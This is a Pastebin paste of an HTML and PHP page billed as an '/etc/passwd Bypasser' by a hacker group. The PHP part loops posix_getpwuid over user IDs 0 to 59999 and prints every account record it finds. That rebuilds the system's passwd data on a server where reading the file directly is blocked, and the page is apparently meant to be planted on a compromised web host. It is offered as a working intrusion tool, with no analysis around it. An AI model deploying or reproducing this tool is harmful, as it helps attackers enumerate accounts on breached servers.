Advertisement
zeeshan-haxor-zesn

/etc/Passwd(LFI) Bypasser By CyberTeamRox

Apr 5th, 2016
385
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.57 KB | None | 0 0
  1. <title>/etc/Passwd Bypass Tool By CyberTeamRox </title>
  2. <body background="https://pbs.twimg.com/profile_images/576236156573995008/MBmY1005.jpg" bgcolor="black">
  3. <form>
  4. <p align="center" dir="rtl"><font color="#008080">
  5. <center><font color="red" face="Tahoma"><h1>/etc/passwd Bypasser </h1></font></a></font><font color="red">
  6. <font color="red"><span lang="ar-sa">
  7. </form>
  8. <form>
  9. <center><td width="50%"><font color=red>users in server:<font color="black">&#222;&#199;&#198;&#227;&#229; &#199;&#225;&#237;&#230;&#210;&#209;&#199;&#202; &#200;&#199;&#225;&#211;&#237;&#209;&#221;&#209;</font></font></td>
  10. <td width="50%"><select size=\"1\" name="plugin"><option value="plugin">/etc/passwd</option></option></select></td>
  11. <td width="100%" colspan="2">
  12. <p align="center"><input type="submit" value="Submit"></td>
  13. </form>
  14. <textarea method='POST' rows=20 cols=100 wrap=off>
  15.  
  16. <?php
  17. error_reporting(0);
  18. if ($_GET['plugin'] )
  19.  
  20. for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
  21. $ara = posix_getpwuid($uid);
  22. if (!empty($ara)) {
  23. while (list ($key, $val) = each($ara)){
  24. print "$val:";
  25. }
  26. print "\n";
  27. }
  28. }
  29. echo "</textarea>";
  30.  
  31. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement